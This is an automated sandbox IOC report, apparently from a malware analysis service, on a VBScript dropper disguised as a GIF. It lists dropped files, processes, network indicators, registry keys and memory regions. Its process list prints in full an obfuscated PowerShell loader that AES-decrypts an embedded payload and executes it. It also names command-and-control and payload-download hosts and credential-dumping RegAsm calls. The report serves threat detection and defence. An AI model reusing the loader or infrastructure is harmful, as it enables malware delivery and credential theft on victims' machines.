IOC Report
screensimplethingstohandlecream.gIF.vbs

loading gif

Files

File Path
Type
Category
Malicious
screensimplethingstohandlecream.gIF.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Notepo\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rivt44j.yhz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3q0gvrle.w22.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvDE09.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xe08c9441, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\nkpfvnsml
Unicode text, UTF-16, little-endian text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screensimplethingstohandlecream.gIF.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkpfvnsml"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xeupwfcgzmvn"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\igzioyninunayvp"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
maveing.duckdns.org
malicious
http://www.imvu.comr
unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
unknown
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
unknown
https://contoso.com/License
unknown
http://geoplugin.net/json.gp7
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
unknown
http://198.46.176.133
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
unknown
https://www.google.com
unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
unknown
http://198.46.176.133/Upload/vbs.jpeg00Bj
unknown
http://geoplugin.net/json.gp/C
unknown
https://maps.windows.com/windows-app-web-link
unknown
http://198.46.176.133/Upload/vbs.jpeg7
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
http://geoplugin.net/json.gpP
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
unknown
http://geoplugin.net/json.gpd
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
unknown
http://198.46.176.133/Upload/vbs.jpeg
198.46.176.133
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://contoso.com/Icon
unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
unknown
http://192.3.176.154/50/HNBC.txt
192.3.176.154
https://github.com/Pester/Pester
unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
unknown
https://www.google.com/accounts/servicelogin
unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
unknown
http://geoplugin.net/json.gpR9
unknown
https://aka.ms/pscore68
unknown
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
unknown
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
unknown
http://192.3.176.154
unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
unknown
http://www.ebuddy.com
unknown
There are 59 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
maveing.duckdns.org
192.3.101.142
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
192.3.101.142
maveing.duckdns.org
United States
malicious
192.3.176.154
unknown
United States
198.46.176.133
unknown
United States
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-F4JFYD
time
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1F162D9C000
trusted library allocation
page read and write
malicious
F5A000
heap
page read and write
malicious
1F161F90000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
FAA000
stack
page read and write
25D7379B000
heap
page read and write
6E4BBFE000
stack
page read and write
7FFD9B760000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
C00000
heap
page read and write
1F153A7E000
trusted library allocation
page read and write
7DF47D850000
trusted library allocation
page execute and read and write
25D73683000
heap
page read and write
264F000
stack
page read and write
F8A000
heap
page read and write
1F16A3D4000
heap
page read and write
25D73711000
heap
page read and write
456000
system
page execute and read and write
A391CF7000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
25D715A0000
heap
page read and write
A39294E000
stack
page read and write
6E4B8FE000
stack
page read and write
459000
system
page execute and read and write
25D73584000
heap
page read and write
25D73776000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
FBE000
heap
page read and write
39BF000
stack
page read and write
25D73433000
heap
page read and write
A391AFD000
stack
page read and write
2C63000
heap
page read and write
25D71648000
heap
page read and write
25D73421000
heap
page read and write
25D73412000
heap
page read and write
25D7166E000
heap
page read and write
25D735DA000
heap
page read and write
25D73535000
heap
page read and write
25D7356C000
heap
page read and write
144B000
heap
page read and write
1F16233C000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
25D73457000
heap
page read and write
1F150330000
heap
page read and write
25D73683000
heap
page read and write
25D73545000
heap
page read and write
1F151EA0000
heap
page readonly
7FFD9B870000
trusted library allocation
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
25D73594000
heap
page read and write
25D735DA000
heap
page read and write
FA0000
heap
page read and write
25D737BE000
heap
page read and write
45C000
system
page execute and read and write
25D737FE000
heap
page read and write
23DE000
stack
page read and write
25D737BE000
heap
page read and write
1F16A22D000
heap
page read and write
25D73799000
heap
page read and write
3D57000
heap
page read and write
9B5000
heap
page read and write
25D73592000
heap
page read and write
2C6A000
heap
page read and write
2CAD000
stack
page read and write
2F50000
heap
page read and write
25D71640000
heap
page read and write
25D735DA000
heap
page read and write
25D71674000
heap
page read and write
10000000
direct allocation
page read and write
DE0000
heap
page read and write
13B0000
heap
page read and write
25D73575000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
25D7352D000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
2CDB000
heap
page read and write
DC0000
heap
page read and write
25D7166B000
heap
page read and write
25D73683000
heap
page read and write
1F15014B000
heap
page read and write
1F15587E000
trusted library allocation
page read and write
1F16A45F000
heap
page read and write
25D737AF000
heap
page read and write
EAC000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1F15447E000
trusted library allocation
page read and write
2650000
heap
page read and write
25D73452000
heap
page read and write
950000
heap
page read and write
7FFD9B76B000
trusted library allocation
page read and write
1F16A479000
heap
page read and write
2540000
heap
page read and write
25D73439000
heap
page read and write
25D7166F000
heap
page read and write
1F15307E000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1F150182000
heap
page read and write
D10000
heap
page read and write
1F152559000
trusted library allocation
page read and write
A391EFE000
stack
page read and write
139E000
stack
page read and write
25D7379F000
heap
page read and write
1F1501CA000
heap
page read and write
25D73796000
heap
page read and write
D80000
heap
page read and write
25D73811000
heap
page read and write
33DF000
stack
page read and write
1F161F81000
trusted library allocation
page read and write
25D714C0000
heap
page read and write
25D737F3000
heap
page read and write
25D73446000
heap
page read and write
25D73802000
heap
page read and write
140E000
stack
page read and write
38BE000
stack
page read and write
7FFD9B752000
trusted library allocation
page read and write
2670000
heap
page read and write
1F150370000
heap
page read and write
7FFD9BAF1000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
9F0000
heap
page read and write
400000
system
page execute and read and write
1F150184000
heap
page read and write
2EEF000
stack
page read and write
25D7343A000
heap
page read and write
A391A7E000
stack
page read and write
A39151E000
stack
page read and write
14E9000
heap
page read and write
25D718D5000
heap
page read and write
25D73510000
heap
page read and write
2693000
heap
page read and write
2DEE000
stack
page read and write
25D735DA000
heap
page read and write
25D73581000
heap
page read and write
25D73439000
heap
page read and write
A391493000
stack
page read and write
1F16A256000
heap
page read and write
25D73439000
heap
page read and write
2B60000
heap
page read and write
25D7379D000
heap
page read and write
25D73511000
heap
page read and write
25D7167C000
heap
page read and write
3230000
heap
page read and write
142B000
heap
page read and write
25D73463000
heap
page read and write
25D7344B000
heap
page read and write
3D6D000
heap
page read and write
25D73790000
heap
page read and write
A39187E000
stack
page read and write
FCF000
heap
page read and write
25D7343A000
heap
page read and write
2C6F000
stack
page read and write
1F16226D000
trusted library allocation
page read and write
25D738AB000
heap
page read and write
25D73521000
heap
page read and write
1F150154000
heap
page read and write
A3919FE000
stack
page read and write
25D7346F000
heap
page read and write
25D73800000
heap
page read and write
474000
remote allocation
page execute and read and write
A3915DE000
stack
page read and write
A39197C000
stack
page read and write
7FFD9B950000
trusted library allocation
page read and write
25D73437000
heap
page read and write
A391BF7000
stack
page read and write
362D000
stack
page read and write
DD0000
heap
page read and write
1F16A1B8000
heap
page read and write
D8A000
heap
page read and write
A3918FE000
stack
page read and write
1F151EB0000
heap
page execute and read and write
1300000
heap
page read and write
13BE000
heap
page read and write
7FFD9B901000
trusted library allocation
page read and write
25D7342E000
heap
page read and write
990000
heap
page read and write
1F151F30000
trusted library allocation
page read and write
8DB000
stack
page read and write
25D7166C000
heap
page read and write
940000
heap
page read and write
25D73427000
heap
page read and write
25D73565000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
CE0000
heap
page read and write
25D7343A000
heap
page read and write
25D73578000
heap
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
1F151EC0000
trusted library allocation
page read and write
1F169F8A000
heap
page read and write
14C0000
heap
page read and write
1F16A170000
heap
page read and write
25D7342D000
heap
page read and write
1F151EF0000
trusted library allocation
page read and write
25D73683000
heap
page read and write
FD4000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
1F150140000
heap
page read and write
25D7377B000
heap
page read and write
25D7341C000
heap
page read and write
2DAF000
stack
page read and write
25D73795000
heap
page read and write
25D73474000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
25D737CD000
heap
page read and write
10001000
direct allocation
page execute and read and write
25D716E2000
heap
page read and write
1F16A470000
heap
page read and write
99C000
stack
page read and write
25D7355D000
heap
page read and write
1F151EF7000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
25D7341A000
heap
page read and write
25D73419000
heap
page read and write
9FB000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
25D7359D000
heap
page read and write
3322000
heap
page read and write
267A000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
1F16A3A0000
heap
page execute and read and write
1F16A43B000
heap
page read and write
25D7166F000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
376E000
stack
page read and write
A39159F000
stack
page read and write
25D7341C000
heap
page read and write
3D55000
heap
page read and write
25D7345F000
heap
page read and write
1F16A413000
heap
page read and write
1F151F70000
heap
page read and write
25D7343F000
heap
page read and write
25D7167C000
heap
page read and write
25D73810000
heap
page read and write
1F16A3C0000
heap
page read and write
25D73422000
heap
page read and write
29EE000
stack
page read and write
1F16A167000
heap
page execute and read and write
D8E000
heap
page read and write
6E4C1FB000
stack
page read and write
6E4BFFE000
stack
page read and write
10016000
direct allocation
page execute and read and write
7FFD9B753000
trusted library allocation
page execute and read and write
25D73599000
heap
page read and write
F4D000
stack
page read and write
400000
system
page execute and read and write
400000
system
page execute and read and write
FB9000
stack
page read and write
1F150374000
heap
page read and write
1F16A640000
heap
page read and write
1220000
heap
page read and write
25D73427000
heap
page read and write
1F16A2C0000
heap
page read and write
D40000
heap
page read and write
25D735DB000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2C60000
heap
page read and write
1F15022C000
heap
page read and write
1320000
heap
page read and write
25D73410000
heap
page read and write
135E000
stack
page read and write
1F16A207000
heap
page read and write
7FFD9BB0A000
trusted library allocation
page read and write
25D737BE000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
41B000
system
page execute and read and write
1F152F59000
trusted library allocation
page read and write
1F16A3C8000
heap
page read and write
25D730C0000
heap
page read and write
25D71675000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
25D73412000
heap
page read and write
A3929CD000
stack
page read and write
6E4B529000
stack
page read and write
8D6000
stack
page read and write
25D737BE000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
25D73428000
heap
page read and write
7FFD9BB14000
trusted library allocation
page read and write
386E000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1F15037A000
heap
page read and write
25D7354D000
heap
page read and write
A391B79000
stack
page read and write
1420000
heap
page read and write
8F2000
stack
page read and write
A391E7E000
stack
page read and write
25D73584000
heap
page read and write
7FFD9B750000
trusted library allocation
page read and write
1F151E90000
trusted library allocation
page read and write
25D735DA000
heap
page read and write
1F154E7E000
trusted library allocation
page read and write
1F16A1BB000
heap
page read and write
25D71653000
heap
page read and write
2E5F000
stack
page read and write
25D73791000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
F50000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
1F150380000
trusted library allocation
page read and write
A391DFE000
stack
page read and write
13FE000
stack
page read and write
25D715C0000
heap
page read and write
25D73412000
heap
page read and write
6E4C0FF000
stack
page read and write
25D737AE000
heap
page read and write
5DC000
stack
page read and write
A391F7B000
stack
page read and write
25D73710000
heap
page read and write
13C0000
heap
page read and write
1F16A1EE000
heap
page read and write
25D73530000
heap
page read and write
3B70000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
3D5B000
heap
page read and write
359F000
stack
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
2DBF000
stack
page read and write
1444000
heap
page read and write
3D0B000
heap
page read and write
24DF000
stack
page read and write
1F16A47C000
heap
page read and write
25D735DC000
heap
page read and write
1F150100000
heap
page read and write
478000
remote allocation
page execute and read and write
DC5000
heap
page read and write
2F90000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1F16227C000
trusted library allocation
page read and write
1210000
heap
page read and write
35EF000
stack
page read and write
25D718D0000
heap
page read and write
25D7341E000
heap
page read and write
1F1503A5000
heap
page read and write
2B6C000
stack
page read and write
1F1501A2000
heap
page read and write
33A0000
heap
page read and write
6E4BEFD000
stack
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
25D73797000
heap
page read and write
25D73439000
heap
page read and write
25D737CE000
heap
page read and write
1F16A160000
heap
page execute and read and write
7FFD9BB01000
trusted library allocation
page read and write
1F16A402000
heap
page read and write
25D735DA000
heap
page read and write
25D737BE000
heap
page read and write
25D73569000
heap
page read and write
25D73421000
heap
page read and write
6E4B9FE000
stack
page read and write
2B2F000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
473000
system
page execute and read and write
8F4000
stack
page read and write
2A2C000
stack
page read and write
1F16A1BD000
heap
page read and write
25D735DA000
heap
page read and write
1F1503A0000
heap
page read and write
372B000
stack
page read and write
1F16A1C0000
heap
page read and write
3B0E000
stack
page read and write
12F0000
heap
page read and write
3A0E000
stack
page read and write
1F16A790000
trusted library section
page read and write
25D7345A000
heap
page read and write
25D73560000
heap
page read and write
1F16A425000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
251E000
stack
page read and write
34EE000
stack
page read and write
1F150120000
heap
page read and write
A10000
heap
page read and write
1F16A468000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
1F15018C000
heap
page read and write
25D737A1000
heap
page read and write
25D7378E000
heap
page read and write
A391D7F000
stack
page read and write
89C000
stack
page read and write
8EF000
stack
page read and write
25D7346C000
heap
page read and write
25D737BE000
heap
page read and write
1F16239C000
trusted library allocation
page read and write
25D7167E000
heap
page read and write
25D73423000
heap
page read and write
25D73417000
heap
page read and write
EBC000
stack
page read and write
A391C7C000
stack
page read and write
25D738AA000
heap
page read and write
45D000
system
page execute and read and write
1F152002000
trusted library allocation
page read and write
6E4BCFF000
stack
page read and write
25D716E2000
heap
page read and write
1F161FF3000
trusted library allocation
page read and write
1F16A20C000
heap
page read and write
25D73421000
heap
page read and write
1F1500F0000
heap
page read and write
1F152537000
trusted library allocation
page read and write
25D73411000
heap
page read and write
25D73548000
heap
page read and write
9B0000
heap
page read and write
14CB000
heap
page read and write
25D737F1000
heap
page read and write
1350000
heap
page read and write
1F151F81000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
25D73416000
heap
page read and write
25D735DA000
heap
page read and write
1F1521A4000
trusted library allocation
page read and write
25D73793000
heap
page read and write
25D7377B000
heap
page read and write
7FFD9B90A000
trusted library allocation
page read and write
There are 405 hidden memdumps, click here to show them.